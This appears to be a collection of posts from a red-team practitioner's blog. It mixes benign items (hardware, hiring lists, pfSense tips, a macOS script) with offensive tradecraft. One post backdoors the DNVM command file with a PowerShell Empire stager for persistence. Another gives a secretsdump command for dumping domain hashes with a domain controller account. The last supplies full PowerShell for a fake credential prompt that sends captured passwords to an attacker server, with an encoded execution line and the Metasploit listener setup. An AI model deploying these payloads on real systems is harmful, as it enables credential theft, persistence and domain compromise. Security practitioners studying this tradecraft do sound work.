Reverse Proxying Attacker Tools

Ever want to have all of your C2 go to the same box, have the functionality of Meterpreter, and Empire, while making it so if anyone goes to the actual site of your C2 all they get is something like Google?

 Nginx makes that possible, and instead of making a blog post that will disappear, I'll point you at my combo in my "Attacker Knowledge Base" site:

https://attackerkb.com/Combinations/ReverseProxyAttackTools

and instead, show you the results once it's setup:

Metasploit:



Empire:
 

And this is what happens if "they" try and use Google:

Read More

Automating PowerShell Empire Install

PowerShell Empire is an excellent tool and can outperform Metasploit in a few crucial ways simply because it’s using Window’s native scripting language, PowerShell. To this end, it is nice to have installed and set up on attack boxes from RaspberryPis to PwnPlugs to Kali boxes, here is how to do manually. In another post I will show you how to make this much more automated:

First you want to take care of installing all of the dependencies by going to their install.sh script and installing pip and the other python packages needed for your installation. (See here https://github.com/PowerShellEmpire/Empire/blob/master/setup/install.sh )
Next, simply clone the repo:

root@wpad:~# git clone https://github.com/powershellempire/empire
Cloning into 'empire'...
remote: Counting objects: 1988, done.
remote: Compressing objects: 100% (58/58), done.
remote: Total 1988 (delta 30), reused 0 (delta 0), pack-reused 1930
Receiving objects: 100% (1988/1988), 5.55 MiB | 357.00 KiB/s, done.
Resolving deltas: 100% (1159/1159), done.
Checking connectivity... done.

CD into the empire/setup directory and issue the “./install.sh” script with the temporary environmental variable “STAGING_KEY”, you can make it equal whatever you wish, or simply pick “RANDOM” and it will automatically select a long, random password for you.

root@wpad:~# cd empire/setup
root@wpad:~/empire/setup# STAGING_KEY=RANDOM ./install.sh
Reading package lists... Done
Building dependency tree
Reading state information... Done
python-dev is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Reading package lists... Done
Building dependency tree
Reading state information... Done
python-m2crypto is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Reading package lists... Done
Building dependency tree
Reading state information... Done
swig is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Reading package lists... Done
Building dependency tree
Reading state information... Done
python-pip is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Requirement already satisfied (use --upgrade to upgrade): pycrypto in /usr/lib/python2.7/dist-packages
Cleaning up...
Requirement already satisfied (use --upgrade to upgrade): iptools in /usr/local/lib/python2.7/dist-packages
Cleaning up...
Requirement already satisfied (use --upgrade to upgrade): pydispatcher in /usr/local/lib/python2.7/dist-packages
Cleaning up...
[*] Database setup completed!
[*] Certificate written to ../data/empire.pem
[*] Setup complete!

The thing I like about doing the “./install.sh” instead of just doing the database setup is that it double checks to make sure that you have all the dependencies correct and creates a certificate for you.

Read More

Intel NUC Super Server

Hi. I'm Rob... and I have a problem. Lets just say, when you find the limitations on Amazon's wishlist features for single items, you know you have a problem. My problem? I'm kinda addicted to Intel NUCs. They are so versitle, low-ish power consumption, and incredibly powerful and TINY. I carry 3 of these (the older / cheaper ones) around to run my trainings / classes from.

The follow is my current wishlist. It is an i7 NUC w/ 500GB of high speed M2 SSD, plus a 1TB SATA SSD, and 32 GB of RAM... ya, thats right 1.5 TB of SSD space, and 32 gigs of RAM!!

	Intel NUC Kit NUC5i7RYH Barebone System $459.99 by Intel Link: http://amzn.com/B00WAS1FX6
	Samsung 850 EVO 500 GB M.2 3.5-Inch SSD (MZ-N5E500BW) $194.99 by Samsung Link: http://amzn.com/B00TGIW1XG
	Samsung 850 EVO 1 TB 2.5-Inch SATA III Internal SSD (MZ-75E1T0B/AM) $346.99 by Samsung Link: http://amzn.com/B00OBRFFAS
	Crucial 1600 MT/s (PC3L-12800) CL11 SODIMM 204-Pin Memory CT204864BF160B $326.31 by Crucial Link: http://amzn.com/B011ISG132

Total Cost: 1328.28

I have gone back and forth between virtualization software (ESXi and Xen mostly)

Xen works out of the box but only has a decent interface in it's Windows GUI. OpenXenManager for Linux is ok. and Xen Orchestrator (Web UI) leaves a bit to be desired. If you're ok with keeping a Windows box around, Xen is the superior choice when it comes to feature sets. (Mainly clone and templating out of the gate and free)

If you do go the ESXi route follow steps here: https://www.virten.net/2015/03/esxi-6-0-image-for-intel-nuc/ because it doesn't work out of the box. I did create the ISO already, so if you want to use the one I made you can find it here: https://dl.dropboxusercontent.com/u/2627512/ESXi-6.0.0.update01-3073146-NUC.iso

You may run into the Manufacturer and Model being random strings (question marks in diamonds), but you can follow: http://www.virten.net/2015/02/how-to-install-esxi-on-5th-gen-intel-nuc-nic-and-ahci-workaround/

Again, I've already done these steps so you can download the pre-built BIOS rom here: https://dl.dropboxusercontent.com/u/2627512/RY0350-FIXED.bio - WARNING: I doubt the BIOS is universal so if you don't buy the NUC listed above, you probably want to just follow the steps yourself. Flashing a BIOS with the wrong ROM could brick the device.

Read More

Meterpreter show_mount

Meterpreter’s STDAPI extension (the one that always gets loaded) has a new command. This doesn’t happen very often so it’s worth noting.

The new command prints out the currently attached “mounts”. In windows world, that means the normal CD ROM, C drive, etc, but it also means all of the mounted network drives as well.

This gets very interesting when you happen to find yourself in a VM environment where you can start writing files to the host:

meterpreter > show_mount
Mounts / Drives
===============
Name Type       Size (Total) Size (Free) Mapped to
---- ----       ------------ ----------- ---------
A:\ removable      0.00 B      0.00 B
C:\ fixed         59.90 GiB   28.15 GiB
D:\ cdrom          0.00 B      0.00 B
Z:\ remote        64.78 GiB   18.09 GiB  \\vmware-host\Shared Folders\

I’ll leave the rest up to your imagination for now. But we will come back to this very soon. Huge thanks to @TheColonial - OJ for implementing this much needed option. Merged pull request is here: https://github.com/rapid7/metasploit-framework/pull/6146

Read More

Time

 

Time is a one-time non-renewable precious resource you are given. It is ok to be greedy, selective, and even snobbish about how, and with whom you spend it.

 

If it helps, think of your time as a vault, money is withdrawn at a constant rate by people as you spend it, but you are not allowed to look inside to see how much you have left. It could be a billion dollars, it could be .25 cents. If it were money, who would you spend it on if that were the case? Most likely you would be more cautious on who and what you spent any amount on.  (This is not to say you live a hermit, but pushing you to actively choose what you want instead of letting life happen and spending your resource)

 

Also, respect other's choice to spend their time with you. I know we don't always acknowledge it, but we should be a bit more cognizant of it.

 

We actually dismiss it nonchalantly, in English, with simple phrasing changes like "Thank you for spending THE time". When we should probably say "Thank you for spending YOUR time". I have heard it both ways and much more the latter, but it just struck me as I was writing the close to this blog post that I was about to do what I had just warned against.

 

So, in closing, thank you for spending your precious moments reading my blog.

 

Rob

Read More

R5 Industries

I recently took the plunge and joined a startup called R5 Industries. I wanted to say thanks for all the well wishes that I received on social media. It has certainly calmed my nerves about the choice ;-).

I've had a number of people ask what R5 Industries does. Our primary selling point is AntigenC2, which is a really Command and Control detection product (no agents). But we also do Red Team assessments and some other fun toys if you are interested, contact@r5industries.com

More info here: http://r5industries.com/

And thats the end and last sales pitch you'll get from me on the subject.

Why did I make the move?

1. While, I loved life as an internal Red Team member (highly recommended, if you need reasons why make sure you watch Chris Gates' talk at RuxCon: https://ruxcon.org.au/speakers/#Chris Gates ) where I got to help steer the boat of a Fortune 10 company, I had a number of opportunities that I had to turn down because of it, even though my higher ups went above and beyond to give me as much latitude as possible.

2. I had a bunch of crazy project ideas that I wanted to see come to life over the years, I don't think I would have ever had the time to see them become anything more than mythical ideas without this opportunity.

So, wish me luck, send me work (as I can finally accept it ;-) [through R5 of course]) and look out for some pretty wacky ideas and products that I've been talking about for years.

Thanks again, I wouldn't be here without you.
Rob

Read More

DotNet's DNVM for Persistence on Developer Machines

One of the best resources for persistence mechanisms is Hexacorn's blog.

http://www.hexacorn.com/blog/category/autostart-persistence/

If you haven't checked out his "Beyond good ol' Run key" (linked above) 32 post series, you really should. But today I wanted to talk about one that I didn't see up there:

DNVM (https://github.com/aspnet/dnvm) is the DotNet Version Manager and it's a part of ASP.NET 5, which I believe has been inside of Visual Studio since the 2013 version. It's there to help to specify which runtime to use for applications, much like RVM (Ruby Version Manager) is for Ruby. With their goal being that you can install .Net and run .Net applications on Linux and Mac as well using DNVM.

Once installed it adds a "DNX_HOME" environmental variable:

 Inside the folder specified are 3 directories:

There are plenty of things to play with in here, but I wanted to specifically point out that the BIN directory is put into the $PATH variable (as well as two others)

C:\WINDOWS\system32\config\systemprofile\.dnx\bin (DOES NOT EXIST BY DEFAULT)
C:\Program Files\Microsoft DNX\Dnvm\
C:\Users\mubix\.dnx\bin

Ok, not a big deal right? Even a user under UAC can edit their own $PATH variable (we'll come back to that in another post)

Lets take a look at what is in those folders:

Interesting, why don't we see what the command dnvm does:

Seriously... I probably don't even have to continue at this point...

But, if I run dnvm from the command prompt (as a developer would) it runs it from inside that protected directory in Program Files right?... RIGHT?! Nope..

Edit the dnvm.cmd with a bit of PowerShell Empire stager (minus the -W Hidden, because we need the user to actually get the output of the dnvm command) and....

[+] Initial agent UU2YKZ3VDG2AUKFY from 192.168.1.109 now active

Boom!

Lets look a bit into how DNVM works to see if there is something juicier there (way to much for a single blog post)

Awesome! So I can modify things in the runtime directory, lets look in there:

Lots, of fun, but we still have to wait until they run some C# code with that run time and guess which one they will use (or backdoor all of them). I would rather just make a modification to the dnvm.cmd and be done with it. Simple and clean.

Oh did I mention that this is used to cross compile binaries? Ya, oh ok, so you can infect the built binaries, or web apps for Windows, Linux and OSX...

Oh and one other thing caught my eye while I was looking into the DNVM.ps1 script:

Have fun!

P.S. Unquoted paths FTW: https://github.com/aspnet/dnvm/pull/357

Read More

Hiding desktop icons for presentations on OSX

If you found this post via a search, you are probably like me, "not great" at keeping your desktop clear "stuff" (you probably have a 'stuff' folder you once put stuff in and forgot about). 

If you are, and you go into a presentation, you probably don't want to have all of your icons visible (and possibly recorded).  Hiding your desktop icons on Windows (since 7 I believe) is pretty simple. 

src: http://www.thewindowsclub.com/desktop-icons-not-showing-windows-7

On OSX, its not as straight forward. Following a tip I found here: http://hints.macworld.com/article.php?story=20100804092806364 I was able to create a keyboard shortcut to hide, or unshide everything.

First, open up "Automator" and create a new document / "Service" 

Then drag and drop "Run AppleScript" from the Utilities section:

Next, make sure it says that the service doesn't accept input from any application:

Paste in the following script:

on run {input, parameters}

set myAnswer to (do shell script "defaults read com.apple.finder CreateDesktop") as boolean

do shell script "defaults write com.apple.finder CreateDesktop " & ((not myAnswer) as string)

do shell script "killall Finder"

end run

On the first run, you may get an error stating that the variable doesn't exist or that it couldn't convert it into a boolen. This is because by default this variable doesn't exist for new users. All you have to do to correct this is open a terminal and type:

defaults write com.apple.finder CreateDesktop true

To set it for the first time:

Back in Automator, re-do the test run of the script:

Save the file and then you can setup up a keyboard shortcut in System Preferences:

Hit Control+Cmd+H to your hearts content. 

Read More

Hacking Advice for @krystropolis

Today I was asked by @Krystropolis for a "Hello" and maybe some hacking advice, see tweet:

I thought about it on my entire 1 hour drive home from just turning in my badge and laptop from a big corporation to go work at a start up. I thought about talking about ethics and data handling, to Geo-politics. I mean, what kind of hacking are we talking about.

I finally ended up thinking about what would have been the best advice for me, growing up, for "how to learn hacking", and I boiled it down right before I pulled into my drive way to two words: "Build It". For me personally, I didn't start to really understand attackers, attacks, or even simple defense strategies until I started to try to build it myself.

For many hackers (and mechanics, my father included) they started by taking things a part first, then putting them back together (usually with a few extra screws or parts that "didn't matter" on the side). But for me, I learned best, by building from scratch. This went from stealing RAM for the "old junk" computer locker from my high school to upgrade my Mom's 95 Mhz Pentium (OH YA!) - in my defense, the computer science teacher told me that I could take anything I needed to build a computer and he didn't specify the physical location that computer had to be in - all the way to working on the sensor grid for the Marine Corps networks when I helped at the MARCERT as a level 1 tech. I even convinced a few of the Hak5 crew at the time to let me build Gentoo (Stage 3 baby!) on their laptops because it was tons faster (once everything compiled 10 years later).

Man do I ramble. Point is. If you want to learn hacking, or how to hack, you need to know a system inside and out first. System (noun) in it's most basic sense. The best penetration testers / hackers I have ever known are the ones that have rebuilt their labs/phone/widget for the 500th time.

UPDATE: I have had a few comments, about the post already. But what I forgot to point out is that by building a system or network you not only get to know the ins and outs of how it works, and what shortcuts you had to take to get it to actually work, but also the appreciation of what it took for you to build it, the hours/research that went into it, how it connects to other systems and clients, and finally what kind of business impact it could or does have on actual corporations. These are core skills to be an effective communicator of risk and need, while keeping compassion for the requirements and business impact. Highly sought after skills in the job market.

I hope this helps.
Rob

Read More

Get PasswordLastSet time for Domain Controller accounts

AKA - ROB WRITES POWERSHELL!!

Yesterday I posted a way to dump hashes using a Domain Controller account. But how do you know which account to use? And when was it's password last set? net user unfortunately won't do computer accounts.

So I decided to write a PowerShell script to find out. Unfortunately Windows 7 doesn't come with the ActiveDirectory PowerShell module (I'm sure there is another way to do this but here is how I did it.

Installed the Remote Server Administration Tools - http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx (Not stealthy)

Then I was able to use the follow janky script I wrote to find all of the PasswordLastSet values for all of the Domain Controllers

Import-Module ActiveDirectory

$dclist = Get-ADDomainController -Filter { isGlobalCatalog -eq $true } | Select-Object Name

Foreach ($dc in $dclist)
{
    $lastset = Get-ADComputer $dc.Name -property PasswordLastSet
    Write-Host "$($dc.Name) - $($lastset.PasswordLastSet)" 
}

This would probably be an awesome recon / situational awareness module for Empire ( https://github.com/PowerShellEmpire/Empire ) but written better hopefully.

Output is pretty simple, it looks like this:

DC1 - 09/15/2015 07:05:40

Now I know that I have about 29 days left of valid use of that hash.

Read More

Using Domain Controller Account Passwords to HashDump Domains

Since I follow both +Carlos Perez and +Benjamin Delpy on Twitter, something caught my eye on August 2nd, soon after +Benjamin Delpy drops DCSync:

https://twitter.com/gentilkiwi/status/627980725074153473

And then later on August 28th, again about the DC$ account (Domain Controller computer account):

https://twitter.com/gentilkiwi/status/637402457740562432

Because DCSync is calling on "sync" based APIs of Active Directory, that are, by default, used only by Domain Controllers, all Domain Controller computer accounts would have the ability to do this as well as the Domain/Enterprise Admins.

Anyone who's ever administered an Active Directory, knows that computer accounts change their passwords automatically. How often do they change them?

https://support.microsoft.com/en-us/kb/154501

Machine account passwords are regularly changed for security purposes. By default, on Windows NT-based computers, the machine account password automatically changes every seven days. Starting with Windows 2000-based computers, the machine account password automatically changes every
30 days. 

PSSSST!! That article is about how to DISABLE automatic password changing

Alright. So, I'm not going to go into "how" to get the hashes for a computer account, but if you've ever dumped passwords before, the computer accounts are the ones with the "$" on the end. Find the ones that are domain controllers, match up the hashes, and use Impacket's secretsdump.py to your heart's content. (Or until the password changes for that DC, then you use another one to dump it again, oh, did I not mention that computers don't change their passwords all at the same time in that 30 day window?)

Remember, Domain Controller's don't have a lot of other permissions, so you need to use the "-just-dc" option in SecretsDump in order for it to just do the domain dump:

python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc LAB/DC2k8_1\$@172.16.102.15

Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Happy #HackersDay

Read More

2015 DerbyCon Hiring

It’s often tough from both hiring and job hunters to find one another at conferences. I think this is mostly because of a couple things.

1. No one wants to stand at a both on either side and talk job stuff in front of a bunch of people and people at booths rarely get the chance to get away.
2. It’s hard to know “who” to talk to.

So I created a very simple Google doc to help put twitter handles and links together for people who are job hunting and people who are hiring to kinda get to know who to talk to.

Got more to add? Please let me know and I’ll get it added, or simply make a comment on the Google doc with the info to add

For reference on how this works, see the 2015 ShmooCon list

Link to the google doc: https://docs.google.com/spreadsheets/d/16TyaalxEilYN_QKIP3GxBMyQ2Kw8YYIj9_j-rgzLiFc

Read More

Tres Lessons from Pied Piper Delete Key Hack

The teflon crew at Pied Piper suffered quite a bit during Season 2 of SILICON VALLEY. But there was no greater indignity than being brought to their knees by a tequila bottle.

Since episode eight “White Hat/Black Hat” aired, many skeptical viewers have asked: how could something like this happen?

Could a mindless error of pressing a delete key really cause a venerable company like Intersite to lose over nine thousand hours of content (including an irreplaceable archive of vintage yiffing videos)?

The short answer: yes.

When the producers of SILICON VALLEY reached out to me during the writing of the episode to help design the sequence, I knew it would be tough to make the technical intricacies track for the joke. But if the team had figured out optimal tip-to-tip of efficiency with Stanford PhDs, I was up for the challenge.

The delete key hack is a perfect storm of bad system hygiene. The dozens of small errors that led to it are more common than most systems administrators care to admit.

There’s a lesson here. Away from the big headlines about hacks at Sony Pictures and Target, companies every day have their systems broken by stupid errors. Most as avoidable as not putting a tequila bottle on a laptop (or letting Russ Hanneman inside your home in the first place).

Below is the the post-mortem on how the hack went down and tres lessons we can learn from it.

The Bake-Off

Intersite set up the bake-off between Endframe and Pied Piper by providing access to an FTP server with the target files. Each company then downloads the individual files, encodes, compresses and roundtrips the file back to the Intersite server.

To speed up the process of the compression, the companies sequentially encode each file to save hard drive space and time waiting for them all to copy down, then they perform the operation.

This is where all the problems originate: to deliver the compressed file, Pied Piper was given full permission to Intersite’s FTP server (because of course it’s easier to just give all permissions than manage every folder’s permissions).

For those interested, the final Pied Piper solution for Intersite would look something like this:

The Hack

When Russ sets down the Tres Comas tequila bottle on Richard’s laptop he unwittingly initiates a massive delete sequence on Intersite’s server. Here are the steps:

1. Richard navigates to bake-off directory or with the extended permissions he got into a parent folder with original content.
2. Gilfoyle turns off the delete verification prompts in the custom software they used for the file transfer and conversion. Richard meanwhile has enabled CRC checking on the internet system, a protection measure for penetration into Pied Piper that backfires.
3. Russ Hanneman arrives with the Tres Comas Tequila and mistakenly sets the bottle down on the keyboard initiating a delete command. Chaos ensues.
4. As the delete sequence launches the large file size of video spins the disks at 100% and locks the system.
5. Hands-on access with the bottle with the persistent delete requests plus the CRC checking creates fork bomb-like effects where the Pied Piper team cannot get back into the system to stop the delete sequence. Intersite is compromised and thousands of hours of video are deleted.

Tres Issues

A myriad of problems contributed to the delete key hack. Using the OWASP framework here are the top tres issues:

A7 - Missing Function Level Access Control “PITA Administration”

Intersite’s FTP server is set up to allow the bake-off users full permissions to the digital masters being used in the bake-off.

But why were they unable to kill the transfer? There are a bunch of reasons this could happen -- the SAN of which they were FTP’ed into was doing massive amounts of data deletion which can be HDD intensive (try deleting over 9000 files and watch your computer crawl).

But they would still be able to kill it on the Pied Piper end?! Not if the transfer agent was queuing up deletes as fast as it could, pegging out the server on the Pied Piper end as well. Remember, everything they had in their garage data center was going into making the conversions go as fast as possible, the transfer back was a lower priority.

A4 - Insecure Direct Object Reference “speed is everything”

By not locking out his screen and letting Russ Hanneman near his unsecured session where he was monitoring the transfer from, Richard allowed direct access to the “delete” key object.

But why didn’t it prompt for approving the delete? Basically when you’re in a bake-off like this, you do absolutely everything to remove any possible obstacles, like ANY prompts or approvals that you might not be around to hit “OK” on.

A6 - Sensitive Data Exposure “We must run forward simply to stay in place”

Intersite did not do a proper backup of their files due to cost and size constraints on their current system. In Episode 7 “Adult Content,” Molly Kendall, Intersite’s CEO, talked about how the porn industry was barely making the bills due to “free” internet porn influx. Intersite was doing its best to stay afloat in its industry and, as such, cut corners not only in the lack of proper admin for their FTP server, but also in storage costs. A mistake they will probably not make again soon.

Tres Lessons

Don’t be an idiot with permissions:

The easiest way in is through the front door. Ensure that everyone is on a need-to-know basis with data. Standard protections like 2-factor authentication and whitelisting IP addresses mean nothing if the wrong people access sensitive information.

Back up your data:

It’s easy to take for granted but reliable storage is still expensive. Most small businesses don’t backup data on a daily basis. Even fewer do so with any form of redundancy or integrity checks.

Don’t work with assholes:

Insider attacks are the hardest to detect and protect against. Surveys estimate 59% go unnoticed until it is too late. The first line of defense is common sense, only hire people you trust — and definitely not anyone who put radio on the Internet.

Read More

Back to Blogger

I've had my fare share of "trying new things" after SquareSpace . I tried Ghost, Octopress, Wordpress, and about 30 others in between. All the blogging platforms I tried had some major issues that I didn't like. I'm sure at some point I'll write about them but this post is mostly just to announce I _finally_ have given up the fight for finding the perfect blogging platform and I'm just going to blog on Blogger from now on. One of the main reasons for just giving in was the fact that I noticed that because I was doing conversion of 500+ blog posts every time I wanted to switch platforms I was constantly "not in the mood" to blog, which kinda negates the whole purpose of finding a new platform. Anywho, rant over. I should be back on the clock now, hopefully bringing cool stuff here in the weeks and months to come.

Read More

pfSense Without Internets

A while back I needed to set up a pfSense box for CTF/example stuff that didn’t and wouldn’t ever have Internet connectivity. Doesn’t seem like much of a task right? Just pop it in and go. Problem is that you loose the use of the packages that help make pfSense so awesome.

Once I figured it out at that time, I made a Forum post so that anyone running into the same issue wouldn’t have to struggle as much:

https://forum.pfsense.org/index.php?topic=55504.0

Most things never disappear from the Internet but I was looking for an old forum post I had bookmarked regarding some persistence methods that I noticed was no longer there since the forum owner had gotten rid of the forum as too much hassle. I get it, but when I went to Archive.org to get saved they didn’t have a copy. So this is what this post is for, to save that content just in case it disappears.

Also, here is a bug report for the “issue” (been open since 2012):

http://redmine.pfsense.org/issues/2586

If you are following:

http://doc.pfsense.org/index.php/Creating_Your_Own_Package_Repository

and you are getting:

Unable to communicate with 192.168.1.100 Please verify DNS and interface configuration, and that pfSense has functional Internet connectivity.

because you are using the repo to enable a offline (non internet connected) host to be able to utilize packages all you have to do is:

1. Go into Services –> DNS Forwarder and add a Host Override

Host: www
Domain: pfsense.org
IP Address: 127.0.0.1
Description: null routed record to enable offline repo

Then make sure you have the IP or hostname of your package repository web server in the /pkg_mgr_settings.php (on 2.0, follow the guidelines on the doc above for older versions). After that you should be good to go. Of course this is barring any Firewall blockages you might have in place so be sure to test connectivity from the pfSense box to the web server.

So, that was just the beginning, it’s actually better to not null-route it but make the following entries:

files.pfsense.org - 192.168.1.100
files.pfsense.com - 192.168.1.100
www.pfsense.org - 192.168.1.100
www.pfsense.com - 192.168.1.100

If your package web server is 192.168.1.100. Next is the problem of not having the packages themselves. So wget -mk -np http://files.pfsense.org/packages/ gave me a directory that I plopped into my already existent packages directory (created from the git clone as described in the documentation) but the problem I ran into was the php files being rendered still (which made any packages that pulled php files get the rendered version instead of source).

So you need to add a .htaccess file in the packages directory with the following:

RemoveHandler .php .phtml .php3
RemoveType .php .phtml .php3
php_flag engine off

Make sure that AllowOverride all is enabled if you are running Apache to host the package site, if not, you’ll have to google how to allow .htaccess files for your particular server. (or if you server doesn’t support htaccess files then how to enable source disclosure)

After those alterations I seem to be off to the races for the most part. Some packages pull from other websites, but altering the package_8.xml or just rerouting the dns seems to solve most of those issues.

Read More

2015 ShmooCon Hiring

It’s often tough from both hiring and job hunters to find one another at conferences. I think this is mostly because of a couple things.

No one wants to stand at a both on either side and talk job stuff in front of a bunch of people and people at booths rarely get the chance to get away.
It’s hard to know “who” to talk to.
So I created a very simple Google doc to help put twitter handles and links together for people who are job hunting and people who are hiring to kinda get to know who to talk to.

Got more to add? Please let me know and I’ll get it added, or simply make a comment on the Google doc with the info to add



https://docs.google.com/spreadsheets/d/1TytbnvqekJEF0jxLANe6sNa5fu05dFaHEP7zudlJej0/edit?usp=sharing

Read More

Powershell Popups + Capture

Metasploit Minute has entered into it’s 3rd “season”. And we kick it off with using the Metasploit capture modules to capture creds from this powershell popup. The cool thing about this is you can leave it to execute on a system without any other code on disk and get creds constantly as any level of user. No admin, no UAC bypass needed. Just a bunch of creds for free.. over SSL. ;–)

Here is the video:



Here is the code:

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');

Lets break down the code line by line:

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserName,[Environment]::UserDomainName);

This tells windows to prompt for credentials, with the title of “Failed Authentication”, no info in the comment (so it uses default), and include the username and domain in the box to add authenticity. Thats where all the magic is, everything else is just gravy.

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};

Tells powershell not to verify SSL certificates (allows us to use self signed certs in the HTTPS transaction later

$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");

Creates a new webclient object and sets its user agent to ‘wget’

$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;

Tells powershell to use whatever proxy the current user uses with whatever credentials they have cached. If one or both are unnecessary it just ignores these settings.

$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');

Tells powershell that the HTTP-Basic credentials to use are the ones typed in the popup box recently by the user.

$result = $wc.downloadstring('https://172.16.102.163');

And finally the request to HTTP-Basic capture module in metasploit, but you could have anything you want capture these creds.

cat power.txt | iconv --to-code UTF-16LE | base64

JABjAHIAZQBkACAAPQAgACQAaABvAHMAdAAuAHUAaQAuAHAAcgBvAG0AcAB0AGYAbwByAGMAcgBlAGQAZQBuAHQAaQBhAGwAKAAnAEYAYQBpAGwAZQBkACAAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuACcALAAnACcALABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBVAHMAZQByAEQAbwBtAGEAaQBuAE4AYQBtAGUAIAArACAAIgBcACIAIAArACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBOAGEAbQBlACwAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBEAG8AbQBhAGkAbgBOAGEAbQBlACkAOwAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKACQAdwBjACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsACgAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAVQBzAGUAcgAtAEEAZwBlAG4AdAAiACwAIgBXAGcAZQB0AC8AMQAuADkAKwBjAHYAcwAtAHMAdABhAGIAbABlACAAKABSAGUAZAAgAEgAYQB0ACAAbQBvAGQAaQBmAGkAZQBkACkAIgApADsACgAkAHcAYwAuAFAAcgBvAHgAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsACgAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsACgAkAHcAYwAuAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAYwByAGUAZABlAG4AdABpAGEAbAAoACQAYwByAGUAZAAuAHUAcwBlAHIAbgBhAG0AZQAsACAAJABjAHIAZQBkAC4AZwBlAHQAbgBlAHQAdwBvAHIAawBjAHIAZQBkAGUAbgB0AGkAYQBsACgAKQAuAHAAYQBzAHMAdwBvAHIAZAAsACAAJwAnACkAOwAKACQAcgBlAHMAdQBsAHQAIAA9ACAAJAB3AGMALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADcAMgAuADEANgAuADEAMAAyAC4AMQA2ADMAJwApADsACgA=

Then execute powershell -ep bypass -enc <the encoded text from above> and you get this:

root@wpad:~/metasploit-framework# ./msfconsole -Lq
msf > use auxiliary/server/capture/http_basic 
msf auxiliary(http_basic) > show options

Module options (auxiliary/server/capture/http_basic):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REALM        Secure Site      yes       The authentication realm you'd like to present.
   RedirectURL                   no        The page to redirect users to after they enter basic auth creds
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      80               yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion   SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                       no        The URI to use for this exploit (default is random)

msf auxiliary(http_basic) > set SSL true
SSL => true
msf auxiliary(http_basic) > set SRVPORT 443
SRVPORT => 443
msf auxiliary(http_basic) > set URIPATH /
URIPATH => /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
msf auxiliary(http_basic) > 
[*] Listening on 0.0.0.0:443...
[*] Using URL: https://0.0.0.0:443/
[*]  Local IP: https://172.16.102.163:443/
[*] Server started.
[*] 172.16.102.140   http_basic - Sending 401 to client 172.16.102.140
